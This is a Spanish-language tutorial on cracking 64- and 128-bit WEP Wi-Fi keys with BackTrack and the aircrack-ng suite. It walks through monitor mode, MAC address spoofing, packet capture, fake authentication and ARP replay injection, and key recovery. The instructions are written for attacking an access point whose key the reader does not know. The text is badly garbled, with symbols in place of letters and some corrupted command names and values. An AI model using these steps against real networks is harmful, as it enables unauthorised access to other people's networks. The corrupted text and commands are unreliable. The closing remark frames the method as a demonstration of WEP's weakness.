Este artculo Explica la forma de crack de 64 bits y 128 bits WEP en muchos puntos de

acceso WII y routers usando retroceso! una distribuci"n #inux #i$e% &u kilometra'e
muy mayo% #a teora b(sica es )ue )ueremos para conectarse a un punto de acceso
usando encriptaci"n WEP! pero no se sabe la cla$e% *amos a atacar el router +ifi! lo
)ue es ,enerar los pa)uetes para nuestro esfuer-o de cra)ueo! finalmente! romper la
cla$e WEP% .e probado esta t/cnica en un I01 2hinkPad 364 y 5cer 6672 y el chipset
Wii en los traba'os de m()uinas con se,uridad%
Requisitos:
0acktrack 8 en 9: o ;&0
<rdenador con una tar'eta compatible con 842%11
Punto de acceso o =outer Wii mediante cifrado WEP
*oy a suponer )ue usted ha descar,ado y arrancado en retroceso 8% &i no han ocupado
esa parte! probablemente no se debe de tratar de )uebrar las cla$es WEP% ;na $e- )ue
se car,a de retroceso! abrir un shell y ha,a lo si,uiente>
Preparacin de la tarjeta WiFi
En primer lu,ar debemos permitir ?1odo 1onitor? de la tar'eta +ifi% &i se utili-a el
Intel @ P=< A Wireless 8B4650C cuesti"n chipset los si,uientes comandos>
modprobe -r iwl3945
modprobe ipwraw
#os comandos anteriores permitir( super$isar el modo en el chipset inal(mbrico de su
e)uipo% 5 continuaci"n se debe detener su tar'eta WII>
iwconfig
2omar nota del nombre de la interfa- del adaptador inal(mbrico% 5 continuaci"n!
deten,a el adaptador de emisi"n>
airmon-ng stop [device]
Entonces>
ifconfig down [interface]
5hora tenemos )ue cambiar la direcci"n 159 del adaptador>
macchanger --mac 00:11:22:33:44: [device]
&u hora de inicio de la tar'eta en modo monitor haciendo>
airmon-ng start [device]
Atacar el blanco
5hora es el momento para buscar un WEP adecuada red habilitada para traba'ar con>
airod!mp-ng [device]
5se,Drese de anotar la direcci"n 159 E0&&I:F! canal E9.F y nombre EE&&I:F de la
red de destino% 5hora tenemos )ue empe-ar a reco,er datos desde el punto de acceso
Wii para el ata)ue>
airod!mp-ng -c [channel] -w [networ"#o!t] --bssid [bssid] [device]
El comando de arriba la salida de datos reco,idos en el archi$o> net+ork%out% Este
archi$o se incluir(n en el pro,rama 9rack WEP cuando estamos listos para romper la
cla$e WEP%
5bra otro shell y de'ar el comando anterior en funcionamiento% 5hora tenemos )ue
,enerar al,unos pa)uetes falsos al punto de acceso para acelerar la salida de datos%
Pruebe el punto de acceso al emitir el comando si,uiente>
airepla$-ng -1 0 -a [bssid] -h 00:11:22:33:44: -e [essid] [device]
&i este comando es correcto )ue ahora $a a ,enerar muchos pa)uetes en la red de
destino para )ue podamos obtener la cla$e% 2ipo>
airpla$-ng -3 -b [bssid] -h 00:11:22:33:44: [device]
Esto for-ar( al punto de acceso para en$iar un mont"n de pa)uetes )ue lue,o puede
utili-ar para descifrar la cla$e WEP% =e$ise su aerodumpGn, &hell y usted debera $er
los ?datos? llenando de pa)uetes%
:espu/s de unos 14%444G24%444 puede empe-ar a romper la cla$e WEP% &i no hay
otros hosts en la ,eneraci"n de pa)uetes de destino del punto de acceso! usted puede
intentar>
airepla$-ng -2 -p 0%41 -c &&:&&:&&:&&:&&:&& -b [bssid] -h
00:11:22:33:44: [device]
;na $e- )ue haya suficientes pa)uetes! comien-a la ,rieta>
aircrac"-ng -n 12% -b [bssid] [filename]-01#cap
El ?Gn 128? si,nifica un 128Gbit WEP Hey% &i cra)ueo no! pruebe con una cla$e de 64
bits al cambiar el $alor de I y 64 aJos%
;na $e- )ue el crack es aprobada! se le de'" con la ##5*EK =etire el> desde la salida y
no es la cla$e% 5s )ue ah lo tienen%
;sted puede utili-ar estas t/cnicas para demostrar a los dem(s por el uso de WEP es
una mala idea% #e su,iero )ue utilice el cifrado WP52 en sus redes inal(mbricas%
CoodluckK